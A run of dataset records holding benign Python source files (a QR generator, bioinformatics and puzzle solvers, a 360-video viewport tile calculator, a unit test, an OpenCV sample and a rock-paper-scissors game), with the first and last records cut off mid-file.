self.btnLabUp > 0:\r\n self.Continuous_Clicks += 1\r\n\r\n if (self.btnLabUp > self.TIME_CONT_CLICKS) and (self.Continuous_Clicks > 0) or (self.btnLabDown > self.TIME_CONT_CLICKS) and (self.Continuous_Clicks > 0):\r\n if self.evn_Continuous_Clicks != None:\r\n self.evn_Continuous_Clicks(self.Continuous_Clicks) # 连续点击事件,次数为1时为单击,请勿在事件中执行过长时间的程序,否则会报定时器错误。\r\n self.Continuous_Clicks = 0\r\n","repo_name":"micropython-Chinese-Community/mpy-lib","sub_path":"keyboard/mechanical-button/single-button/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"31"} +{"seq_id":"15895877710","text":"import pyqrcode\r\nfrom PIL import ImageColor\r\n\r\ncolor = ImageColor.getcolor(input(\"couleur principale en hex : \"), 'RGBA')\r\nlink = input(str('lien ou code : '))\r\nqr = pyqrcode.create(link)\r\n\r\nimg = qr.png(\"code.png\", scale=20, module_color=list(color))\r\n\r\nprint(\"Done.\")\r\n","repo_name":"HenryElvis/GenerateQRCode","sub_path":"QRCodeGenerator.py","file_name":"QRCodeGenerator.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23709894705","text":"codon_dic = {\n \"TTT\": \"F\", \n \"CTT\": \"L\", \n \"ATT\": \"I\", \n \"GTT\": \"V\",\n \"TTC\": \"F\", \n \"CTC\": \"L\", \n \"ATC\": \"I\", \n \"GTC\": \"V\",\n \"TTA\": \"L\", \n \"CTA\": \"L\", \n \"ATA\": \"I\", \n \"GTA\": \"V\",\n \"TTG\": \"L\", \n \"CTG\": \"L\", \n \"ATG\": \"M\", \n \"GTG\": \"V\",\n \"TCT\": \"S\", \n \"CCT\": \"P\", \n \"ACT\": \"T\", \n \"GCT\": \"A\",\n \"TCC\": \"S\", \n \"CCC\": \"P\", \n \"ACC\": \"T\", \n \"GCC\": \"A\",\n \"TCA\": \"S\", \n \"CCA\": \"P\", \n \"ACA\": \"T\", \n \"GCA\": \"A\",\n \"TCG\": \"S\", \n \"CCG\": \"P\", \n \"ACG\": \"T\", \n \"GCG\": \"A\",\n \"TAT\": \"Y\", \n \"CAT\": \"H\", \n \"AAT\": \"N\", \n \"GAT\": \"D\",\n \"TAC\": \"Y\", \n \"CAC\": \"H\", \n \"AAC\": \"N\", \n \"GAC\": \"D\",\n \"TAA\": \"Stop\", \n \"CAA\": \"Q\", \n \"AAA\": \"K\", \n \"GAA\": \"E\",\n \"TAG\": \"Stop\", \n \"CAG\": \"Q\", \n \"AAG\": \"K\", \n \"GAG\": \"E\",\n \"TGT\": \"C\", \n \"CGT\": \"R\", \n \"AGT\": \"S\", \n \"GGT\": \"G\",\n \"TGC\": \"C\", \n \"CGC\": \"R\", \n \"AGC\": \"S\", \n \"GGC\": \"G\",\n \"TGA\": \"Stop\", \n \"CGA\": \"R\", \n \"AGA\": \"R\", \n \"GGA\": \"G\",\n \"TGG\": \"W\", \n \"CGG\": \"R\", \n \"AGG\": \"R\", \n \"GGG\": \"G\", \n}\n\n\n\n\n\n#M is the start codon, ATG\ntext = \"\"\"\n>Rosalind_8755\nCGGAGCAACCATATCACATTCCGTGACGGGCCACACTTACCCCCTTGACAACGCCATAAG\nGACGGCCACTGGGAGGCAACGTGTTGACGCTAGCCGCGACCATGGCGACCGTTTTTATGC\nCTGCTCTGACTACATCGCCTGCTACGTCATGCATGGGGTCGTTCTCGATGATTCTCATCC\nTATCCAGTTTCCGAGTGTGCCAAGATAAGGGTGTACAAGCTCGCAGCACCGAGGGGGTAC\nTAGAGCCGACGCTTTCATTGAGCGTAGACCTCTGTTCTTCCATAGTCCCGAATGTGGGGG\nACCGCCTCGGCAGGTGACTCTTGCAGCCTAAGGCTACTACAGTATGCCTCAGCGCCCACG\nACGCCAGTGAGTTATGTGCAGTCGCACTATCTTGGGATCATACAGGTACCAGTCTCGTAC\nCTTGGCGCGCTCGCAGAGATTTCCGATGCCAATTACGGTTGATGTAGTAAAAGCTTAGCT\nAAGCTTTTACTACATCAACCGTAATTGGCATGATCAAGCCTGTCTATCCAAGTGCCGGTA\nCCAAATACACACCGCCTTTGGGGTCATACACGTAGACATCTTAAATCTATATGAAAGTTC\nCCCGAACGATGTAACGCACATCTTTAGAACTGCCTATGGTGCAGGGATGCGCATACTAAT\nACTTTTTGGACAAAGCTGTTTCATCATGGTGTGCCTACGTCCCGTGGTCGGCGAGAATCT\nCGTCTCTTCATACCAAGTGCAAGGGCTCTAGCAAGTAGTTCTGAAATGGATCATGGGTAA\nATGGTAGCACTTTGTTAGACGTGGCACTCTCATGGACCAGTGGACACGGTTATTCCCGCC\nTAATGACACACCTACGAAATGGTCCCGCTGTAGGAAGATCCCCTCATGAGCGTAATTAAA\nGGCTGGAACTGAGGCGAACACATACTAACTGTAACGTCAGTTATATATCAGCATTA\n\"\"\"\n\narray_of_ros = text.split(\">\")[1:]\narray_of_ros_split = []\ndata = []\nfor i in range(len(array_of_ros)):\n array_of_ros[i] = (array_of_ros[i].split(\"\\n\"))\n\nfor i in range(len(array_of_ros)):\n count = 0\n store = \"\"\n for j in range(len(array_of_ros[i])):\n count += 1\n if count != 1:\n store += array_of_ros[i][j]\n data.append(store)\n\n\n\n\ntext_reverse = text[::-1]\ntext_reverse_result = \"\"\nfor i in text_reverse:\n if i == \"A\":\n text_reverse_result = text_reverse_result + \"T\"\n if i == \"T\":\n text_reverse_result = text_reverse_result + \"A\"\n if i == \"C\":\n text_reverse_result = text_reverse_result + \"G\"\n if i == \"G\":\n text_reverse_result = text_reverse_result + \"C\"\n\noutput_array = []\ndata.append(text_reverse_result)\nfor k in data:\n for i in range(len(k)):\n tally = 2\n store = \"\"\n if k[i:i+3] == \"ATG\":\n #print(range(i,len(k)))\n for j in range(i,len(k)):\n #print(i,j)\n tally += 1\n store = store + k[j]\n if tally == 3:\n tally = 0\n if (k[j:j+3] == \"TGA\") or (k[j:j+3] == \"TAG\") or (k[j:j+3] == \"TAA\"): \n #print(store, \" \",k)\n output_array.append(store)\n break\n\nprotein_array = []\nfor j in output_array:\n array = []\n tally = 0\n store = \"\"\n for i in j:\n tally += 1\n store = store + i\n if tally == 3:\n tally = 0\n array.append(store)\n store = \"\"\n store = \"\"\n for i in array:\n if codon_dic[i] != \"Stop\":\n store = store + codon_dic[i]\n protein_array.append(store) \n\n#print(protein_array)\n\nprotein_array_unique = []\nfor i in protein_array:\n if i not in protein_array_unique:\n protein_array_unique.append(i)\noutput = \"\"\nfor i in protein_array_unique:\n output += i + \"\\n\"\nprint(output)\n","repo_name":"Dauthlin/Rosalind-Questions","sub_path":"Open Reading Frames with reverse.py","file_name":"Open Reading Frames with reverse.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16594134626","text":"# uses amazon comprehend to evaluate the sentiment of a given input\nimport boto3\n\ntext = input(\"Insert a phrase whose sentiment will be evaluated: \")\n\nclient = boto3.client('comprehend')\nreq_resp = client.detect_sentiment(LanguageCode=\"en\",\n Text=text)\n\nprint(\"The detected sentiment was: \" + req_resp['Sentiment'])\n\n\nfor sentiment, confidence_value in req_resp['SentimentScore'].items():\n print(sentiment + \": \" + str(confidence_value))\n","repo_name":"jpcorreia99/aws-ML","sub_path":"comprehend/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8439864910","text":"import argparse\nfrom abc import ABC, abstractmethod\nfrom math import pi\n\nimport numpy as np\n\nnp.set_printoptions(precision=3)\n\nfrom matplotlib import pyplot as plt\n\nfrom util import splitx, rot_matrix, get_borders\n\n\nclass Viewport:\n base_normals: np.ndarray\n fov: tuple\n px_in_vp: np.ndarray\n yaw_pitch_roll: np.ndarray = np.array([0, 0, 0])\n _mat_rot: np.ndarray\n _rotated_normals: np.ndarray\n _is_in_vp: bool\n\n def __init__(self, yaw_pitch_roll: tuple, fov: tuple):\n \"\"\"\n Viewport Class used to extract view pixels in projections.\n The vp is an image as numpy array with shape (H, M, 3).\n That can be RGB (matplotlib, pillow, etc) or BGR (opencv).\n\n :param frame yaw_pitch_roll: (600, 800) for 800x600px\n :param fov: (fov_v, fov_h) in rad. Ex: \"np.array((pi/2, pi/2))\" for (90°x90°)\n \"\"\"\n self.fov = fov\n self.make_base_normals()\n self.yaw_pitch_roll = np.asarray(yaw_pitch_roll)\n\n def is_viewport(self, x_y_z: np.ndarray) -> bool:\n \"\"\"\n Check if the plane equation is true to viewport\n x1 * m + y1 * n + z1 * z < 0\n If True, the \"point\" is on the viewport\n Obs: is_in só retorna true se todas as expressões forem verdadeiras\n\n :param x_y_z: A 3D Point list in the space [(x, y, z), ...].T, shape == (3, ...)\n :return: A boolean belong = np.all(inner_product <= 0, axis=0).reshape(self.shape)\n\n \"\"\"\n inner_prod = self.rotated_normals.T @ x_y_z\n self.px_in_vp = np.all(inner_prod <= 0, axis=0)\n self._is_in_vp = np.any(self.px_in_vp)\n return self._is_in_vp\n\n def make_base_normals(self) -> None:\n \"\"\"\n Com eixo entrando no observador, rotação horário é negativo e anti-horária\n é positivo. Todos os ângulos são radianos.\n\n O exito x aponta para a direita\n O eixo y aponta para baixo\n O eixo z aponta para a frente\n\n Deslocamento para a direita e para cima e horário é positivo.\n\n O viewport é a região da esfera que faz intersecção com 4 planos que passam pelo\n centro (4 grandes círculos): cima, direita, baixo e esquerda.\n Os planos são definidos tal que suas normais (N) parte do centro e apontam na mesma direção a\n região do viewport. Ex: O plano de cima aponta para cima, etc.\n Todos os píxeis que estiverem abaixo do plano {N(x,y,z) dot P(x,y,z) <= 0}\n O plano de cima possui incinação de FOV_Y / 2.\n Sua normal é x=0,y=sin(FOV_Y/2 + pi/2), z=cos(FOV_Y/2 + pi/2)\n O plano de baixo possui incinação de -FOV_Y / 2.\n Sua normal é x=0,y=sin(-FOV_Y/2 - pi/2), z=cos(-FOV_Y/2 - pi/2)\n O plano da direita possui incinação de FOV_X / 2. (para direita)\n Sua normal é x=sin(FOV_X/2 + pi/2),y=0, z=cos(FOV_X/2 + pi/2)\n O plano da esquerda possui incinação de -FOV_X/2. (para direita)\n Sua normal é x=sin(-FOV_X/2 - pi/2),y=0, z=cos(-FOV_X/2 - pi/2)\n\n :return:\n \"\"\"\n fov_y_2, fov_x_2 = np.array(self.fov) / (2, 2)\n pi_2 = np.pi / 2\n\n self.base_normals = np.array([[0, -np.sin(fov_y_2 + pi_2), np.cos(fov_y_2 + pi_2)], # top\n [0, -np.sin(-fov_y_2 - pi_2), np.cos(-fov_y_2 - pi_2)], # bottom\n [np.sin(fov_x_2 + pi_2), 0, np.cos(fov_x_2 + pi_2)], # left\n [np.sin(-fov_x_2 - pi_2), 0, np.cos(-fov_x_2 - pi_2)]]).T # right\n\n @property\n def rotated_normals(self) -> np.ndarray:\n self._rotated_normals = rot_matrix(self.yaw_pitch_roll) @ self.base_normals\n return self._rotated_normals\n\n\nclass Projection(ABC):\n viewport: Viewport\n yaw_pitch_roll: np.ndarray\n projection: np.ndarray # A RGB image\n vptiles: dict\n\n def __init__(self, tiling: str, proj_res: str, fov: str):\n # Create the viewport\n self.fov = np.deg2rad(splitx(fov)[::-1])\n\n # Create the projection\n self.shape = np.array(splitx(proj_res)[::-1], dtype=int)\n self.proj_coord_nm = np.mgrid[range(self.shape[0]), range(self.shape[1])]\n\n # Create the tiling\n self.tiling = np.array(splitx(tiling)[::-1], dtype=int)\n self.n_tiles = self.tiling[0] * self.tiling[1]\n self.tile_shape = (self.shape / self.tiling).astype(int)\n self.tile_position_list = np.array([(n, m)\n for n in range(0, self.shape[0], self.tile_shape[0])\n for m in range(0, self.shape[1], self.tile_shape[1])])\n\n # Get tiles borders\n self.tile_border_base = get_borders(shape=self.tile_shape)\n\n @property\n @abstractmethod\n def nfaces(self):\n pass\n\n def get_tile_borders_nm(self, idx: int):\n # projection agnostic\n return self.tile_border_base + self.tile_position_list[idx].reshape(2, -1)\n\n def get_tile_array(self, tile, array):\n n, m = self.tile_position_list[tile]\n h, w = self.tile_shape\n if array.shape[0] >= 3:\n return array[..., n:n + h, m:m + w]\n else:\n return array[n:n + h, m:m + w]\n\n @staticmethod\n @abstractmethod\n def nm2xyz(nm_coord: np.ndarray, shape: np.ndarray, face: int):\n pass\n\n @staticmethod\n @abstractmethod\n def xyz2nm(nm_coord: np.ndarray, shape: np.ndarray):\n pass\n\n @abstractmethod\n def get_vptiles(self, yaw_pitch_roll) -> list[int]:\n pass\n\n @abstractmethod\n def get_projection(self):\n pass\n\n\nclass ERP(Projection):\n @property\n def nfaces(self):\n return 1\n\n def __init__(self, tiling: str, proj_res: str, fov: str):\n super().__init__(tiling, proj_res, fov)\n self.proj_coord_xyz = self.nm2xyz(self.proj_coord_nm, self.shape)\n\n self.tiles_borders_xyz = []\n for tile in range(self.n_tiles):\n borders_nm = self.get_tile_borders_nm(tile)\n self.tiles_borders_xyz.append(self.nm2xyz(nm_coord=borders_nm, shape=self.shape))\n\n def get_vptiles(self, yaw_pitch_roll) -> dict[int, str]:\n \"\"\"\n\n :param yaw_pitch_roll: The coordinate of center of VP.\n :return:\n \"\"\"\n if tuple(self.tiling) == (1, 1):\n return {0: '100.00%'}\n\n self.viewport = Viewport(yaw_pitch_roll, self.fov)\n self.vptiles = {}\n n_pix = self.tile_shape[0] * self.tile_shape[1]\n\n for tile in range(self.n_tiles):\n tile_coord_xyz = self.get_tile_array(tile, self.proj_coord_xyz)\n if self.viewport.is_viewport(tile_coord_xyz.reshape([3, -1])):\n count_pix = np.sum(self.viewport.px_in_vp)\n self.vptiles[tile] = f'{100 * count_pix / n_pix:.2f}%'\n # plt.imshow(self.viewport.px_in_vp.reshape(self.tile_shape));plt.show()\n\n return self.vptiles\n\n def get_projection(self):\n self.projection = np.zeros(self.shape, dtype='uint8')\n\n for tile in range(self.n_tiles):\n n, m = self.get_tile_borders_nm(tile)\n if tile in self.vptiles:\n self.projection[n, m] = 255\n else:\n self.projection[n, m] = 100\n\n self.viewport.is_viewport(self.proj_coord_xyz.reshape((3, -1)))\n belong = self.viewport.px_in_vp.reshape(self.proj_coord_xyz.shape[1:])\n self.projection[belong] = 200\n\n return self.projection\n\n @staticmethod\n def nm2xyz(nm_coord: np.ndarray, shape: np.ndarray, face: int = 0):\n \"\"\"\n ERP specific.\n\n :param face: 0 for ERP\n :param nm_coord: shape==(2,...)\n :param shape: (N, M)\n :return:\n \"\"\"\n azimuth = ((nm_coord[1] + 0.5) / shape[1] - 0.5) * 2 * np.pi\n elevation = ((nm_coord[0] + 0.5) / shape[0] - 0.5) * -np.pi\n\n z = np.cos(elevation) * np.cos(azimuth)\n y = -np.sin(elevation)\n x = np.cos(elevation) * np.sin(azimuth)\n\n xyz_coord = np.array([x, y, z])\n return xyz_coord\n\n @staticmethod\n def xyz2nm(xyz_coord: np.ndarray, shape: np.ndarray = None, round_nm: bool = False):\n \"\"\"\n ERP specific.\n\n :param xyz_coord: [[[x, y, z], ..., M], ..., N] (shape == (N,M,3))\n :param shape: the shape of projection that cover all sphere\n :param round_nm: round the coords? is not needed.\n :return:\n \"\"\"\n if shape is None:\n shape = xyz_coord.shape[:2]\n\n N, M = shape[:2]\n\n r = np.sqrt(np.sum(xyz_coord ** 2, axis=0))\n\n elevation = np.arcsin(xyz_coord[1] / r)\n azimuth = np.arctan2(xyz_coord[0], xyz_coord[2])\n\n v = elevation / pi + 0.5\n u = azimuth / (2 * pi) + 0.5\n\n n = v * N - 0.5\n m = u * M - 0.5\n\n if round_nm:\n n = np.mod(np.round(n), N)\n m = np.mod(np.round(m), M)\n\n return np.array([n, m])\n\n\nclass CMP(Projection):\n def __init__(self, tiling: str, proj_res: str, fov: str):\n super().__init__(tiling, proj_res, fov)\n\n # Create faces structures\n face_h, face_w = face_shape = (self.shape / (2, 3)).astype(int)\n face_array_mn = np.mgrid[range(face_h), range(face_w)]\n\n self.face_position_list = np.array([(n, m)\n for n in range(0, self.shape[0], face_h)\n for m in range(0, self.shape[1], face_w)])\n\n self.proj_coord_xyz = self.nm2xyz(self.proj_coord_nm)\n\n self.tiles_borders_xyz = []\n for tile in range(self.n_tiles):\n borders_nm = self.get_tile_borders_nm(tile)\n borders_xyz = self.proj_coord_xyz[:, borders_nm[0, :], borders_nm[1, :]] # testar\n self.tiles_borders_xyz.append(borders_xyz)\n\n @property\n def nfaces(self):\n return 6\n\n @staticmethod\n def nm2xyz(nm_coord: np.ndarray, proj_shape: np.ndarray = None, face: int = None):\n # nm_coord is only for face\n u = v = np.array([])\n z, y, x = 0, 0, 0\n\n def face2vu():\n nonlocal u, v\n face_nm_array = np.mgrid[range(face_h), range(face_w)]\n u = 2 * (face_nm_array[1] + 0.5) / face_w - 1 # (-1, 1)\n v = -2 * (face_nm_array[0] + 0.5 - face_h) / face_h - 1 # (-1, 1)\n\n def vu2xyz():\n nonlocal z, y, x\n nonlocal u, v\n if face == 0:\n # left no rotate\n x = -np.ones(u.shape)\n y = -v\n z = u\n elif face == 1:\n # center no rotate\n x = u\n y = -v\n z = np.ones(u.shape)\n elif face == 2:\n # right no rotate\n x = np.ones(u.shape)\n y = -v\n z = -u\n elif face == 3:\n # down rotate 90° anti-clockwise\n w = np.zeros(u.shape)\n a = np.array([u, v, w])\n u1, v1, w3 = (a.transpose([1, 2, 0]) @ rot_matrix([0, 0, pi / 2])).transpose([2, 0, 1])\n\n x = u1\n y = np.ones(u.shape)\n z = v1\n elif face == 4:\n # back rotate 90° clockwise\n w = np.zeros(u.shape)\n a = np.array([u, v, w])\n u1, v1, w3 = (a.transpose([1, 2, 0]) @ rot_matrix([0, 0, -pi / 2])).transpose([2, 0, 1])\n\n x = -u1\n y = -v1\n z = -np.ones(u.shape)\n elif face == 5:\n # up rotate 90° anti-clockwise\n w = np.zeros(u.shape)\n a = np.array([u, v, w])\n u1, v1, w3 = (a.transpose([1, 2, 0]) @ rot_matrix([0, 0, pi / 2])).transpose([2, 0, 1])\n\n x = u1\n y = -np.ones(u.shape)\n z = -v1\n\n if face is None:\n if proj_shape is None:\n proj_shape = np.array(nm_coord.shape[-2:])\n\n face_h, face_w = (proj_shape / (2, 3)).astype(int)\n face2vu()\n\n face_position_list = np.array([(n, m)\n for n in range(0, proj_shape[0], face_h)\n for m in range(0, proj_shape[1], face_w)])\n proj_coord_xyz = np.zeros((3, proj_shape[0], proj_shape[1]))\n for face in range(6):\n vu2xyz()\n n, m = face_position_list[face]\n proj_coord_xyz[:, n:n + face_h, m:m + face_w] = np.array([x, y, z])\n\n return proj_coord_xyz\n\n else:\n assert isinstance(face, int)\n assert isinstance(proj_shape, np.ndarray)\n face_h, face_w = proj_shape / (2, 3)\n face2vu()\n vu2xyz()\n return np.array([x, y, z])\n\n @staticmethod\n def xyz2nm(xyz_coord: np.ndarray, shape: np.ndarray = None, round_nm: bool = False, face: int = 0):\n x, y, z = xyz_coord\n f = 0\n r = np.sqrt(x ** 2 + y ** 2 + z ** 2)\n azimuth = np.arctan2(x, z)\n elevation = np.arcsin(-y / r)\n u = azimuth / (2 * np.pi) + 0.5\n v = -elevation / np.pi + 0.5\n f, m, n = 0, 0, 0\n return f, m, n\n\n get_vptiles = ERP.get_vptiles\n get_projection = ERP.get_projection\n\n\ndef test():\n # erp '144x72', [array([0, 0]), array([144, 72]), array([288, 144]), array([432, 216]), array([576, 288]), array([720, 360]), array([864, 432]), array([1008, 504]), array([1152, 576]), array([1296, 648])]\n # cmp '108x72', [array([0, 0]), array([108, 72]), array([216, 144]), array([324, 216]), array([432, 288]), array([540, 360]), array([648, 432]), array([756, 504]), array([864, 576]), array([972, 648])]\n\n # proj = ERP('6x4', f'1152x768', '100x100')\n proj = CMP('6x4', f'972x648', '100x90')\n\n # for i in [30]:\n for frame, i in enumerate(range(0, -360, -10)):\n tiles = proj.get_vptiles(np.deg2rad((0, 0, i)))\n projection = proj.get_projection()\n plt.imsave(f'teste/teste_{frame}.png', projection)\n\n print(f'The viewport touch the tiles {tiles}.')\n\n\ndef main():\n if proj == 'erp':\n projection = ERP(tiling, f'1296x648', fov)\n elif proj == 'cmp':\n projection = CMP(tiling, f'972x648', fov)\n else:\n raise ValueError('The -proj must be \"erp\" or \"cmp\"')\n\n tiles = projection.get_vptiles(np.deg2rad(yaw_pitch_roll))\n\n if out is not None:\n projection = projection.get_projection()\n plt.imsave(f'{out}', projection)\n\n import json\n print(json.dumps(tiles, indent=2))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description='Get the tiles seen in viewport.')\n parser.add_argument('-proj', default='erp', metavar='PROJECTION', help='The projection [erp|cmp]')\n parser.add_argument('-fov', default='100x90', metavar='FOV', help=f'The Field of View in degree. Ex: 100x90')\n parser.add_argument('-tiling', default='3x2', metavar='TILING', help=f'The tiling of projection. Ex: 3x2.')\n parser.add_argument('-coord', default=['0', '0', '0'], nargs=3, metavar=('YAW', 'PITCH', 'ROLL'), help=f'The center of viewport in degree ex: 15,25,-30')\n parser.add_argument('-out', default=None, metavar='OUTPUT_FILE', help=f'Save the projection marks to OUTPUT_FILE file.')\n\n args = parser.parse_args()\n proj = args.proj\n fov = args.fov\n tiling = args.tiling\n yaw_pitch_roll: list = list(map(float, args.coord))\n out = args.out\n\n main()\n","repo_name":"henriquedgarcia/get_tiles","sub_path":"get_tiles.py","file_name":"get_tiles.py","file_ext":"py","file_size_in_byte":15572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27611419506","text":"from __future__ import division\n\nimport unittest\nimport numpy as np\n\nimport tttrlib\nfrom misc.compute_irf import model_irf\n\n\nirf, time_axis = model_irf(\n n_channels=64,\n period=32.,\n irf_position_p=2.0,\n irf_position_s=18.0,\n irf_width=0.25\n)\nbg = np.zeros_like(irf) + 0.2\n\n\nclass Tests(unittest.TestCase):\n\n def test_fit25(self):\n n_channels = 32\n irf_position_p = 2.0\n irf_position_s = 18.0\n irf_width = 0.25\n irf, time_axis = model_irf(\n n_channels=n_channels,\n period=32.,\n irf_position_p=irf_position_p,\n irf_position_s=irf_position_s,\n irf_width=irf_width\n )\n dt = time_axis[1] - time_axis[0]\n data = np.array(\n [0, 0, 0, 1, 9, 7, 5, 5, 5, 2, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 2, 2, 2, 2, 3, 0, 1, 0,\n 1, 1, 1, 2, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n )\n bg = np.zeros_like(irf)\n settings = {\n 'dt': dt,\n 'g_factor': 1.0,\n 'l1': 0.1,\n 'l2': 0.1,\n 'period': 32.0,\n 'convolution_stop': 31,\n 'irf': irf,\n 'background': bg,\n 'verbose': False\n }\n fit25 = tttrlib.Fit25(**settings)\n tau1, tau2, tau3, tau4 = 0.5, 1.0, 2.0, 4.0\n gamma, r0 = 0.02, 0.38\n x = np.array([tau1, tau2, tau3, tau4, gamma, r0])\n fixed = np.array([0, 0, 0, 0, 1, 1])\n r = fit25(\n data=data,\n initial_values=x,\n fixed=fixed\n )\n best_tau = r['x'][0]\n self.assertEqual(best_tau, 2.0)\n","repo_name":"Fluorescence-Tools/tttrlib","sub_path":"test/test_DecayFit25.py","file_name":"test_DecayFit25.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"9144378602","text":"from Utility import InputLoader\n\nimport statistics\nimport math\n\nwith InputLoader(day=7) as reader:\n crabs = [int(x) for line in reader for x in line.split(\",\")]\n\n\ndef complicated_but_robust():\n \"\"\"\n Makes a guess for the starting position, and starts looking around for the local minimum in terms of fuel consumed.\n Whatever position results in the minimum fuel consumption should be flanked by 2 positions that have\n greater or equal fuel consumption.\n\n Otherwise, follow the \"slope\" downwards towards this minimum. This means that if for position X you have\n a fuel consumption greater than that for position X + 1, that means position X - 1 will be even greater and\n is not worth checking; instead look in the direction of position X + 2 until you find where it\n starts sloping back up again, and find that inflection point (which will be the minimum).\n\n Maybe could be made smarter by detecting the magnitude of the slope and adjusting the amount the \"cursor\" moves\n by, but doesn't appear to be necessary\n \"\"\"\n\n center = statistics.mean(crabs)\n position = math.floor(center)\n direction = 1\n value_map = dict()\n\n while True:\n if position not in value_map:\n value_map[position] = sum(fuel_consumption(abs(c - position)) for c in crabs)\n\n if position - 1 in value_map and position + 1 in value_map:\n if value_map[position] < min(value_map[position - 1], value_map[position + 1]):\n break\n elif value_map[position] > value_map[position + 1]:\n position += 1\n direction = 1\n else:\n position -= 1\n direction = -1\n elif position - direction in value_map:\n if value_map[position] <= value_map[position - direction]:\n position += direction\n else:\n position -= direction\n direction *= -1\n elif position + direction in value_map:\n if value_map[position] <= value_map[position + direction]:\n position -= direction\n direction *= -1\n else:\n position += direction\n else:\n position += direction\n\n print(f\"POSITION = {position}\")\n fuel = sum(fuel_consumption(abs(c - position)) for c in crabs)\n print(f\"FUEL CONSUMED = {fuel}\")\n\n\n#\n\n\ndef simple_but_unproven():\n \"\"\"\n The mean of the values seems to end up being the center position. However, I can't explain WHY that would be,\n so this solution might break under circumstances other than what I have available to me (because it works for\n those that I do).\n \"\"\"\n center = statistics.mean(crabs)\n fuel = min(sum(fuel_consumption(abs(c - math.floor(center))) for c in crabs),\n sum(fuel_consumption(abs(c - math.ceil(center))) for c in crabs))\n print(f\"CENTER = {center}\")\n print(f\"FUEL CONSUMED = {fuel}\")\n\n\n#\n\n\ndef fuel_consumption(dist: int) -> int:\n return int(((dist + 1) * dist) / 2)\n\n\ndef distance(fuel: int) -> int:\n return int(0.5 * ((((8 * fuel) + 1) ** 0.5) - 1))\n\n\n#\n\n\nif __name__ == '__main__':\n complicated_but_robust()\n","repo_name":"cgdilley/AdventOfCode2021","sub_path":"src/Day07/Day07.1.py","file_name":"Day07.1.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"24065663261","text":"#1/usr/bin/env python\nimport re\n\n\ninfile=\"NA_counts_at_positions.txt\"\n\nkeeps={}\nwith open(infile, 'r') as IN:\n\tfor line in IN:\n\t\tline=line.rstrip('\\n')\n\t\titems=re.split('\\t',line)\n\t\tposition,count,frac=items\n\t\tif float(frac) <.10:\n\t\t\tkeeps[position]=frac\n\nOUT=open(\"kin_matrix_ins_reduced.txt\", 'w')\norg=\"kin_matrix_ins.txt\"\n\nwith open(org, 'r') as IN:\n\theader=next(IN)\n\tOUT.write(header)\n\tfor line in IN:\n\t\tline=line.rstrip('\\n')\n\t\titems=re.split('\\t',line)\n\t\tpos=items[0]\n\t\tif pos in keeps.keys():\n\t\t\tOUT.write(line +'\\n')\n\nOUT.close()\n","repo_name":"AndersenLab/Transposons2","sub_path":"scripts/reduce_insertion_positions.py","file_name":"reduce_insertion_positions.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12510192682","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"user/aoi.png\")\nimg1 = cv2.imread(\"user/aoi.png\")\nimg2 = cv2.imread(\"user/trim.png\")\nkernel = np.ones((5, 5))\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n\n\nprint(\"=== HOughLines & HoughLinesP ===\")\n#img = cv2.imread(\"tmk.png\", 0)\ncanny = cv2.Canny(img, 50, 100)\nlines = cv2.HoughLines(canny, 1, np.pi / 180, 100)\nprint(type(lines))\nlines = cv2.HoughLinesP(canny, 1, np.pi / 180, 100, 10)\nprint(type(lines))\n","repo_name":"hoge1e3/jslesson","sub_path":"data/fs/home/0123/cho/pylib_sample6/cv2_sample_oecu.py","file_name":"cv2_sample_oecu.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"72909006808","text":"import random\n\nprint(\"Hi there!\\n======Welcome to Rock-Paper-Scissors Python Game======!\")\n\nwhile True:\n # Getting user input\n user = input(\n \"Pick an option ('R' for rock, 'P' for paper, 'S' for scissors)\\nPlayer: \",\n )\n # List of possible options\n options = [\"R\", \"P\", \"S\"]\n\n computer = random.choice(options)\n\n # Computer option\n print(\"CPU:\", computer)\n\n # Logic conditions (Win, lose or Draw/Tie)\n if user == computer:\n print(\"Both Player and CPU have selected the same option\\nIt's a tie!\")\n\n elif user == \"R\":\n if computer == \"P\":\n print(\"Player (Rock) : CPU (Paper)\\nComputer wins!\")\n else:\n print(\"Player wins!\")\n\n elif user == \"R\":\n if computer == \"S\":\n print(\"Player (Rock) : CPU (Scissors)\\nPlayer wins!\")\n else:\n print(\"Computer wins!\")\n\n elif user == \"S\":\n if computer == \"R\":\n print(\"Player (Scissors) : CPU (Rock)\\nComputer wins!\")\n else:\n print(\"Player wins!\")\n\n elif user == \"S\":\n if computer == \"P\":\n print(\"Player (Scissors) : CPU (Paper)\\nPlayer wins!\")\n else:\n print(\"Computer wins!\")\n\n elif user == \"P\":\n if computer == \"S\":\n print(\"Player (Paper) : CPU (Scissors)\\nComputer wins!\")\n else:\n print(\"Player wins!\")\n\n elif user == \"P\":\n if computer == \"R\":\n print(\"Player (Paper) : CPU (Rock)\\nPlayer wins!\")\n else:\n 